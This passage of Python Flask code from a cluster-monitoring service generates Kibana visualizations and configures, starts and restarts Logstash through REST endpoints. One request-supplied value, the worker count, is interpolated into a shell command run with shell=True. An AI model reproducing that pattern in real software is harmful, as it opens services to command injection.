return response
if qNode is None:
response = jsonify({'Status': 'No registered nodes'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nodeDict = {}
for nodes in qNode:
listRoles = nodes.nRoles.split(', ')
nodeDict[nodes.nodeFQDN] = {'IP': nodes.nodeIP, 'Roles': listRoles}
ecc = ESCoreConnector(esEndpoint=qESCore.hostIP, index='.kibana')
rsp = {}
listLoad = []
listMemory = []
listPackets = []
listOctets = []
listIfError = []
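# For each registered node render every visualization template (load, memory, packets, octets, interface errors) and push it into the .kibana index under a deterministic id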
for node in nodeDict.keys():
try:
template = templateEnv.get_template(os.path.join(kbVisTemp, 'load.tmp'))
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] Template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Load template file unavailable'})
response.status_code = 500
return response
nodeIDName = node.split('.')[-1]
lsindex = 'logstash-*' # TODO create separate viz for more than one index
infoKBCore = {"nodeID": node, "nodeIDName": nodeIDName, "index": lsindex}
kbConf = template.render(infoKBCore)
idStr = "%s-CPU-Load" % nodeIDName
res = ecc.pushToIndex('.kibana', 'visualization', kbConf, id=idStr)
try:
listLoad.append(res["_id"])
except Exception as inst:
app.logger.warning('[%s] : [ERROR] Failed to create visualization with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
listLoad.append({'Failed': node})
try:
template = templateEnv.get_template(os.path.join(kbVisTemp, 'memory.tmp'))
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] Template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Load template file unavailable'})
response.status_code = 500
return response
nodeIDName = node.split('.')[-1]
lsindex = 'logstash-*' # TODO create separate viz for more than one index
infoKBCore = {"nodeID": node, "nodeIDName": nodeIDName, "index": lsindex}
kbConf = template.render(infoKBCore)
idStr = "%s-Memory" % nodeIDName
res = ecc.pushToIndex('.kibana', 'visualization', kbConf, id=idStr)
try:
listMemory.append(res["_id"])
except Exception as inst:
app.logger.warning('[%s] : [ERROR] Failed to create visualization with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
listMemory.append({'Failed': node})
try:
template = templateEnv.get_template(os.path.join(kbVisTemp, 'packets.tmp'))
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] Template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Load template file unavailable'})
response.status_code = 500
return response
nodeIDName = node.split('.')[-1]
lsindex = 'logstash-*' # TODO create separate viz for more than one index
infoKBCore = {"nodeID": node, "nodeIDName": nodeIDName, "index": lsindex}
kbConf = template.render(infoKBCore)
idStr = "%s-Packets" % nodeIDName
res = ecc.pushToIndex('.kibana', 'visualization', kbConf, id=idStr)
try:
listPackets.append(res["_id"])
except Exception as inst:
app.logger.warning('[%s] : [ERROR] Failed to create visualization with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
listPackets.append({'Failed': node})
try:
template = templateEnv.get_template(os.path.join(kbVisTemp, 'octets.tmp'))
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] Template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Load template file unavailable'})
response.status_code = 500
return response
if len(node.split('.')) == 1:
nodeIDName = node
else:
nodeIDName = node.split('.')[-1]
lsindex = 'logstash-*' # TODO create separate viz for more than one index
infoKBCore = {"nodeID": node, "nodeIDName": nodeIDName, "index": lsindex}
kbConf = template.render(infoKBCore)
idStr = "%s-Octets" % nodeIDName
res = ecc.pushToIndex('.kibana', 'visualization', kbConf, id=idStr)
try:
listOctets.append(res["_id"])
except Exception as inst:
app.logger.warning('[%s] : [ERROR] Failed to create visualization with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
listOctets.append({'Failed': node})
try:
template = templateEnv.get_template(os.path.join(kbVisTemp, 'iferror.tmp'))
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] Template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Load template file unavailable'})
response.status_code = 500
return response
nodeIDName = node.split('.')[-1]
lsindex = 'logstash-*' # TODO create separate viz for more than one index
infoKBCore = {"nodeID": node, "nodeIDName": nodeIDName, "index": lsindex}
kbConf = template.render(infoKBCore)
idStr = "%s-IfError" % nodeIDName
res = ecc.pushToIndex('.kibana', 'visualization', kbConf, id=idStr)
try:
listIfError.append(res["_id"])
except Exception as inst:
app.logger.warning('[%s] : [ERROR] Failed to create visualization with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
listIfError.append({'Failed': node})
rsp['Load'] = listLoad
rsp['Memory'] = listMemory
rsp['Packets'] = listPackets
rsp['Octets'] = listOctets
rsp['IfError'] = listIfError
app.logger.info('[%s] : [INFO] Created visualizations %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(rsp))
response = jsonify(rsp)
response.status_code = 201
return response
@dmon.route('/v1/overlord/core/kb/visualizations/storm')
class KBVisualizationsStorm(Resource):
def post(self):
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
kbVisTemp = os.path.join(tmpDir, 'visualizations')
qNode = dbNodes.query.all()
qESCore = dbESCore.query.filter_by(MasterNode=1).first()
if qESCore is None:
response = jsonify({'Status': 'ES Core not registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] ES Core not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if qNode is None:
response = jsonify({'Status': 'No registered nodes'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qSCore = dbSCore.query.first()
if qSCore is None:
response = jsonify({"Status": "No LS instances registered", "spouts": 0, "bolts": 0})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No LS instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if qSCore.LSCoreStormTopology == 'None':
response = jsonify({"Status": "No Storm topology registered"})
response.status_code = 404
app.logger.info('[%s] : [INFO] No Storm topology registered, cannot fetch number of spouts and bolts',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
else:
bolts, spouts = checkStormSpoutsBolts(qSCore.LSCoreStormEndpoint, qSCore.LSCoreStormPort,
qSCore.LSCoreStormTopology)
response = jsonify({'Topology': qSCore.LSCoreStormTopology, "spouts": spouts, "bolts": bolts})
response.status_code = 200
app.logger.info('[%s] : [INFO] Storm topology %s with %s spouts and %s bolts found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qSCore.LSCoreStormTopology), str(spouts), str(bolts))
ecc = ESCoreConnector(esEndpoint=qESCore.hostIP, index='.kibana')
listStorm = []
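# The storm template expands into a list of Kibana saved objects parametrised by the number of spouts and bolts of the registered topology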
try:
template = templateEnv.get_template(os.path.join(kbVisTemp, 'storm.tmp'))
except Exception as inst:
app.logger.error('[%s] : [ERROR] Template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Load template file unavailable'})
response.status_code = 500
return response
lsindex = 'logstash-*' # TODO create separate viz for more than one index
infoKBCoreStorm = {"nBolt": bolts, "nSpout": spouts, "lsindex": lsindex}
kbStorm = template.render(infoKBCoreStorm)
kbStormJ = json.loads(kbStorm)
for visualisation in kbStormJ:
res = ecc.pushToIndex('.kibana', visualisation['_type'], visualisation['_source'], id=visualisation['_id'])
try:
listStorm.append(res["_id"])
except Exception as inst:
app.logger.warning('[%s] : [ERROR] Failed to create visualization with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
listStorm.append({'Failed': visualisation})
app.logger.info('[%s] : [INFO] Generated storm visualizations for topology %s: %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qSCore.LSCoreStormTopology), str(listStorm))
response = jsonify({'Visualizations': listStorm})
response.status_code = 201
return response
@dmon.route('/v1/overlord/core/ls/config')
class LSCoreConfiguration(Resource):
def get(self):
if not os.path.isdir(cfgDir):
response = jsonify({'Error': 'Config dir not found !'})
response.status_code = 404
return response
if not os.path.isfile(os.path.join(cfgDir, 'logstash.conf')):
response = jsonify({'Error': 'Config file not found !'})
response.status_code = 404
return response
try:
lsCfgfile = open(os.path.join(cfgDir, 'logstash.conf'), 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
return response
return send_file(lsCfgfile, mimetype='text/plain', as_attachment=True)
@api.expect(lsCore)
def put(self):
requiredKeys = ['HostFQDN', 'ESClusterName']
if not request.json:
abort(400)
for key in requiredKeys:
if key not in request.json:
response = jsonify({'Error': 'malformed request, missing key(s)'})
response.status_code = 400
return response
qESCheck = dbESCore.query.filter_by(clusterName=request.json['ESClusterName'])
if qESCheck is None:
response = jsonify({'Status': 'Invalid cluster name: ' + request.json['ESClusterName']})
response.status_code = 404
return response
qSCore = dbSCore.query.filter_by(hostFQDN=request.json['HostFQDN']).first() #TODO: rework which kv pair is required
if 'IP' not in request.json:
hIP = '127.0.0.1'
else:
hIP = request.json['IP']
if 'OS' not in request.json:
os = "unknown"
else:
os = request.json["OS"]
if 'LSCoreHeap' not in request.json:
lsHeap = '1g'
else:
lsHeap = request.json["LSCoreHeap"]
if 'LSCoreWorkers' not in request.json:
lsWorkers = '4'
else:
lsWorkers = request.json["LSCoreWorkers"]
if 'LSCoreStormEndpoint' not in request.json:
StormEnd = 'None'
else:
StormEnd = request.json['LSCoreStormEndpoint']
if 'LSCoreStormPort' not in request.json:
StormPort = 'None'
else:
StormPort = request.json['LSCoreStormPort']
if 'LSCoreStormTopology' not in request.json:
StormTopo = 'None'
else:
StormTopo = request.json['LSCoreStormTopology']
if 'LSCoreSparkEndpoint' not in request.json:
SparkEnd = 'None'
else:
SparkEnd = request.json['LSCoreSparkEndpoint']
if 'LSCoreSparkPort' not in request.json:
SparkPort = 'None'
else:
SparkPort = request.json['LSCoreSparkPort']
if 'ESClusterName' not in request.json:
ESCname = 'diceMonit'
else:
ESCname = request.json['ESClusterName']
if 'udpPort' not in request.json:
udpPort = 25826
else:
udpPort = request.json['udpPort']
if 'LPort' not in request.json:
lumberPort = 5000
else:
lumberPort = request.json['LPort']
if 'Index' not in request.json:
rIndex = 'logstash'
else:
rIndex = request.json['Index']
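# Create a new LS Core record if the host is unknown, otherwise update only the fields present in the request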
if qSCore is None:
upS = dbSCore(hostFQDN=request.json["HostFQDN"], hostIP=hIP, hostOS=os,
outESclusterName=ESCname, udpPort=udpPort,
inLumberPort=lumberPort, LSCoreWorkers=lsWorkers, LSCoreHeap=lsHeap,
LSCoreStormEndpoint=StormEnd, LSCoreStormPort=StormPort, LSCoreStormTopology=StormTopo,
LSCoreSparkEndpoint=SparkEnd, LSCoreSparkPort=SparkPort, diceIndex=rIndex)
db.session.add(upS)
db.session.commit()
response = jsonify({'Added': 'LS Config for ' + request.json["HostFQDN"]})
response.status_code = 201
return response
else:
# qESCore.hostFQDN =request.json['HostFQDN'] #TODO document hostIP and FQDN may not change in README.md
if 'IP' in request.json:
qSCore.hostIP = hIP
if 'OS' in request.json:
qSCore.hostOS = os
if 'LSCoreWorkers' in request.json:
qSCore.LSCoreWorkers = lsWorkers
if 'LSCoreHeap' in request.json:
qSCore.LSCoreHeap = lsHeap
if 'ESClusterName' in request.json:
qSCore.outESclusterName = ESCname
if 'udpPort' in request.json:
qSCore.udpPort = udpPort
if 'LPort' in request.json:
qSCore.inLumberPort = lumberPort
if StormEnd != 'None':
qSCore.LSCoreStormEndpoint = StormEnd
if StormPort != 'None':
qSCore.LSCoreStormPort = StormPort
if StormTopo != 'None':
qSCore.LSCoreStormTopology = StormTopo
if SparkEnd != 'None':
qSCore.LSCoreSparkEndpoint = SparkEnd
if SparkPort != 'None':
qSCore.LSCoreSparkPort = SparkPort
if 'Index' in request.json:
qSCore.diceIndex = rIndex
db.session.commit()
response = jsonify({'Updated': 'LS config for ' + request.json["HostFQDN"]})
response.status_code = 201
return response
# return "Changes configuration fo logstash server"
@dmon.route('/v1/overlord/core/ls')
class LSCoreController(Resource):
def get(self):
hostsAll = db.session.query(dbSCore.hostFQDN, dbSCore.hostIP, dbSCore.hostOS, dbSCore.inLumberPort,
dbSCore.sslCert, dbSCore.sslKey, dbSCore.udpPort, dbSCore.outESclusterName,
dbSCore.LSCoreStatus,
dbSCore.LSCoreStormEndpoint, dbSCore.LSCoreStormPort, dbSCore.LSCoreStormTopology,
dbSCore.LSCoreSparkEndpoint, dbSCore.LSCoreSparkPort, dbSCore.LSCoreHeap, dbSCore.LSCorePID).all()
resList = []
for hosts in hostsAll:
confDict = {}
confDict['HostFQDN'] = hosts[0]
confDict['IP'] = hosts[1]
confDict['OS'] = hosts[2]
confDict['LPort'] = hosts[3]
confDict['udpPort'] = hosts[6]
confDict['ESClusterName'] = hosts[7]
confDict['LSCoreStormEndpoint'] = hosts[9]
confDict['LSCoreStormPort'] = hosts[10]
confDict['LSCoreStormTopology'] = hosts[11]
confDict['LSCoreSparkEndpoint'] = hosts[12]
confDict['LSCoreSparkPort'] = hosts[13]
if checkPID(hosts[15]):
confDict['Status'] = hosts[8]
confDict['PID'] = hosts[15]
app.logger.info('[%s] : [INFO] LS Core service found at PID %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(hosts[15]))
else:
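# Fall back to the PID file written at startup; a live PID there means Logstash is running but detached from the DB record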
pidLSLoc = os.path.join(pidDir, 'logstash.pid')
if os.path.isfile(pidLSLoc):
esPIDf = check_proc(pidLSLoc)
if checkPID(esPIDf):
confDict['Status'] = 'detached' #TODO: Document failed message if PID is not assigned to an LS Instance
confDict['PID'] = esPIDf
app.logger.warning('[%s] : [WARN] Detached LS Core service found at PID %s, setting to detached',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
esPIDf)
else:
confDict['Status'] = 'unknown' # TODO: Document failed message if PID is not assigned to an LS Instance
confDict['PID'] = 0
app.logger.warning('[%s] : [WARN] LS Core service not found, setting to unknown',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
confDict['LSCoreHeap'] = hosts[14]
resList.append(confDict)
response = jsonify({'LS Instances': resList})
response.status_code = 200
return response
def post(self):
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
lsTemp = os.path.join(tmpDir, 'logstash.tmp') # tmpDir+"/collectd.tmp"
lsfCore = os.path.join(cfgDir, 'logstash.conf')
# qSCore = db.session.query(dbSCore.hostFQDN).first()
qSCore = dbSCore.query.first() # TODO: currently only one LS instance supported
# return qSCore
if qSCore is None:
response = jsonify({"Status": "No LS instances registered"})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No LS instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qESCore = dbESCore.query.filter_by(MasterNode=1).first() # TODO: only works with the master node
if qESCore is None:
response = jsonify({"Status": "No ES instances registered"})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No ES instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if checkPID(qSCore.LSCorePID) is True:
subprocess.call(['kill', '-9', str(qSCore.LSCorePID)])
app.logger.info('[%s] : [INFO] Killed LS Instance at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qSCore.LSCorePID))
try:
template = templateEnv.get_template(lsTemp)
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] LS template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({"Status": "LS Tempalte file unavailable!"})
response.status_code = 404
return response
if qSCore.sslCert == 'default':
certLoc = os.path.join(credDir, 'logstash-forwarder.crt')
else:
certLoc = os.path.join(credDir, qSCore.sslCert + '.crt')
if qSCore.sslKey == 'default':
keyLoc = os.path.join(credDir, 'logstash-forwarder.key')
else:
keyLoc = os.path.join(credDir, qSCore.sslKey + '.key')
if qSCore.LSCoreStormEndpoint == 'None':
StormRestIP = 'None'
else:
StormRestIP = qSCore.LSCoreStormEndpoint
qNodeRoles = db.session.query(dbNodes.nRoles).all()
if qNodeRoles is None:
uniqueRolesList = ['unknown']
else:
uList = []
for r in qNodeRoles:
uList.append(r[0].split(', '))
uniqueRoles = set(x for l in uList for x in l) #TODO find better solution for finding unique roles
uniqueRolesList = list(uniqueRoles)
qMetInt =dbMetPer.query.first()
if qMetInt is None:
stormInterval = '60'
else:
stormInterval = qMetInt.stormMet
if 'storm' in uniqueRolesList:
stormStatus = 'Storm registered'
bolts, spouts = checkStormSpoutsBolts(StormRestIP, qSCore.LSCoreStormPort, qSCore.LSCoreStormTopology)
if spouts == 0 or bolts == 0:
uniqueRolesList.remove('storm')
app.logger.warning('[%s] : [WARN] Storm topology spouts and bolts not found, ignoring Storm',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
stormStatus = 'Storm Ignored'
else:
stormStatus = 'Not registered'
spouts = 0
bolts = 0
app.logger.info('[%s] : [INFO] Storm Status -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), stormStatus)
qBDService = dbBDService.query.first()
if qBDService is None:
yarnHEnd = 'None'
yarnHPort = '19888'
yarnHPoll = '30'
yarnStatus = 'Not Registered'
else:
yarnHEnd = qBDService.yarnHEnd
yarnHPort = qBDService.yarnHPort
yarnHPoll = qBDService.yarnHPoll
yarnStatus = 'Registered'
app.logger.info('[%s] : [INFO] Yarn History Status -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), yarnStatus)
# appname tag is set the same for spark and yarn
qActiveApp = dbApp.query.filter_by(jobID='ACTIVE').first()
if qActiveApp is None:
app.logger.warning('[%s] : [WARN] No active applications registered, tag set to default',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
appName = 'default'
else:
appName = qActiveApp.jobID
app.logger.info('[%s] : [INFO] Tag for application %s set',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), appName)
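# Build the template context: SSL material, ES output target, Storm/Yarn polling settings, node roles and the active application tag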
infoSCore = {"sslcert": certLoc, "sslkey": keyLoc, "udpPort": qSCore.udpPort,
"ESCluster": qSCore.outESclusterName, "EShostIP": qESCore.hostIP,
"EShostPort": qESCore.nodePort, "StormRestIP": StormRestIP,
"StormRestPort": qSCore.LSCoreStormPort, "StormTopologyID": qSCore.LSCoreStormTopology,
'storm_interval': stormInterval, 'roles': uniqueRolesList, 'myIndex': qSCore.diceIndex,
'nSpout': spouts, 'nBolt': bolts, 'yarnHEnd': yarnHEnd, 'yarnHPort': yarnHPort,
'yarnHPoll': yarnHPoll, 'appName': appName}
sConf = template.render(infoSCore)
qSCore.conf = sConf
# print >>sys.stderr, esConf
db.session.commit()
lsCoreConf = open(lsfCore, "w+")
lsCoreConf.write(sConf)
lsCoreConf.close()
os.environ['LS_HEAP_SIZE'] = os.getenv('LS_HEAP_SIZE',
qSCore.LSCoreHeap) # TODO: if heap size set in env then use it if not use db one
app.logger.info('[%s] : [INFO] LS Heap size set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(os.environ['LS_HEAP_SIZE']))
lsLogfile = os.path.join(logDir, 'logstash.log')
lsPid = 0
LSServerCmd = '/opt/logstash/bin/logstash agent -f %s -l %s -w %s' % (lsfCore, lsLogfile, qSCore.LSCoreWorkers)
try:
lsPid = subprocess.Popen(LSServerCmd, shell=True).pid
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot start LS instance with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
qSCore.LSCoreStatus = 'unknown'
qSCore.LSCorePID = lsPid
lsPIDFileLoc = os.path.join(pidDir, 'logstash.pid')
try:
lsPIDFile = open(lsPIDFileLoc, 'w+')
lsPIDFile.write(str(lsPid))
lsPIDFile.close()
except IOError:
response = jsonify({'Error': 'File I/O!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] Cannot write LS pid file',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qSCore.LSCoreStatus = 'Running'
app.logger.info('[%s] : [INFO] LS instance started with PID %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(lsPid))
response = jsonify({'Status': 'Logstash Core PID ' + str(lsPid),
'Storm': stormStatus,
'YarnHistory': yarnStatus})
response.status_code = 200
return response
@dmon.route('/v2/overlord/core/ls')
class LSCoreControllerInit(Resource):
def post(self):
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
lsTemp = os.path.join(tmpDir, 'logstash.tmp') # tmpDir+"/collectd.tmp"
lsfCore = os.path.join(cfgDir, 'logstash.conf')
# qSCore = db.session.query(dbSCore.hostFQDN).first()
qSCore = dbSCore.query.first() # TODO: currently only one LS instance supported
# return qSCore
if qSCore is None:
response = jsonify({"Status": "No LS instances registered"})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No LS instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qESCore = dbESCore.query.filter_by(MasterNode=1).first() # TODO: only works with the master node
if qESCore is None:
response = jsonify({"Status": "No ES instances registered"})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No ES instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if checkPID(qSCore.LSCorePID) is True:
subprocess.call(['kill', '-9', str(qSCore.LSCorePID)])
app.logger.info('[%s] : [INFO] Killed LS Instance at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qSCore.LSCorePID))
try:
template = templateEnv.get_template(lsTemp)
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] LS template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({"Status": "LS Tempalte file unavailable!"})
response.status_code = 404
return response
if qSCore.sslCert == 'default':
certLoc = os.path.join(credDir, 'logstash-forwarder.crt')
else:
certLoc = os.path.join(credDir, qSCore.sslCert + '.crt')
if qSCore.sslKey == 'default':
keyLoc = os.path.join(credDir, 'logstash-forwarder.key')
else:
keyLoc = os.path.join(credDir, qSCore.sslKey + '.key')
if qSCore.LSCoreStormEndpoint == 'None':
StormRestIP = 'None'
else:
StormRestIP = qSCore.LSCoreStormEndpoint
qNodeRoles = db.session.query(dbNodes.nRoles).all()
if qNodeRoles is None:
uniqueRolesList = ['unknown']
else:
uList = []
for r in qNodeRoles:
uList.append(r[0].split(', '))
uniqueRoles = set(x for l in uList for x in l)
uniqueRolesList = list(uniqueRoles)
qMetInt =dbMetPer.query.first()
if qMetInt is None:
stormInterval = '60'
else:
stormInterval = qMetInt.stormMet
if 'storm' in uniqueRolesList:
stormStatus = 'Storm registered'
bolts, spouts = checkStormSpoutsBolts(StormRestIP, qSCore.LSCoreStormPort, qSCore.LSCoreStormTopology)
if spouts == 0 or bolts == 0:
uniqueRolesList.remove('storm')
app.logger.warning('[%s] : [WARN] Storm topology spouts and bolts not found, ignoring Storm',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
stormStatus = 'Storm ignored'
else:
stormStatus = 'Not registered'
spouts = 0
bolts = 0
app.logger.info('[%s] : [INFO] Storm Status -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), stormStatus)
qBDService = dbBDService.query.first()
if qBDService is None:
yarnHEnd = 'None'
yarnHPort = '19888'
yarnHPoll = '30'
yarnStatus = 'Not Registered'
else:
yarnHEnd = qBDService.yarnHEnd
yarnHPort = qBDService.yarnHPort
yarnHPoll = qBDService.yarnHPoll
yarnStatus = 'Registered'
app.logger.info('[%s] : [INFO] Yarn History Status -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), yarnStatus)
# appname tag is set the same for spark and yarn
qActiveApp = dbApp.query.filter_by(jobID='ACTIVE').first()
if qActiveApp is None:
app.logger.warning('[%s] : [WARN] No active applications registered, tag set to default',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
appName = 'default'
else:
appName = qActiveApp.jobID
app.logger.info('[%s] : [INFO] Tag for application %s set',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), appName)
infoSCore = {"sslcert": certLoc, "sslkey": keyLoc, "udpPort": qSCore.udpPort,
"ESCluster": qSCore.outESclusterName, "EShostIP": qESCore.hostIP,
"EShostPort": qESCore.nodePort, "StormRestIP": StormRestIP,
"StormRestPort": qSCore.LSCoreStormPort, "StormTopologyID": qSCore.LSCoreStormTopology,
'storm_interval': stormInterval, 'roles': uniqueRolesList, 'myIndex': qSCore.diceIndex,
'nSpout': spouts, 'nBolt': bolts, 'yarnHEnd': yarnHEnd, 'yarnHPort': yarnHPort,
'yarnHPoll': yarnHPoll, 'appName': appName}
sConf = template.render(infoSCore)
qSCore.conf = sConf
# print >>sys.stderr, esConf
db.session.commit()
lsCoreConf = open(lsfCore, "w+")
lsCoreConf.write(sConf)
lsCoreConf.close()
os.environ['LS_HEAP_SIZE'] = os.getenv('LS_HEAP_SIZE',
qSCore.LSCoreHeap) # TODO: if heap size set in env then use it if not use db one
app.logger.info('[%s] : [INFO] LS Heap size set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(os.environ['LS_HEAP_SIZE']))
lsLogfile = os.path.join(logDir, 'logstash.log')
lsPIDFileLoc = os.path.join(pidDir, 'logstash.pid')
if os.path.isfile(lsPIDFileLoc):
lsPidf = check_proc(lsPIDFileLoc)
else:
lsPidf = 0
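# Start or restart through the dmon-ls service script; the branch taken depends on whether the DB PID or the detached pid-file PID is still alive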
if lsPidf != qSCore.LSCorePID:
app.logger.warning("[%s] : [WARN] Conflicting PID values found, detached pid -> %s, attached -> %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(lsPidf),
str(qSCore.LSCorePID))
if checkPID(qSCore.LSCorePID) is True:
try:
subprocess.check_call(["service", "dmon-ls", "restart", qSCore.LSCoreHeap, qSCore.LSCoreWorkers])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot restart LS Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot restart LS Core'})
response.status_code = 500
return response
lsPID = check_proc(lsPIDFileLoc)
if not lsPID:
app.logger.error("[%s] : [ERROR] Can't read pidfile for ls core",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Cannot read lscore pid file'})
response.status_code = 500
return response
qSCore.LSCorePID = lsPID
qSCore.LSCoreStatus = 'Running'
response = jsonify({'Status': 'LS Core Restarted', 'PID': lsPID})
response.status_code = 201
return response
elif checkPID(int(lsPidf)) is True:
try:
subprocess.check_call(["service", "dmon-ls", "restart", qSCore.LSCoreHeap, qSCore.LSCoreWorkers])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot restart detached LS Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot restart detached LS Core'})
response.status_code = 500
return response
lsPID = check_proc(lsPIDFileLoc)
if not lsPID:
app.logger.error("[%s] : [ERROR] Can't read pidfile for ls core",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Cannot read ls core pid file'})
response.status_code = 500
return response
qSCore.LSCorePID = lsPID
qSCore.LSCoreStatus = 'Running'
response = jsonify({'Status': 'LS Core Restarted and attached', 'PID': lsPID})
response.status_code = 201
return response
else:
try:
subprocess.check_call(["service", "dmon-ls", "start", qSCore.LSCoreHeap, qSCore.LSCoreWorkers])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot start LS Core service with %s and %s",
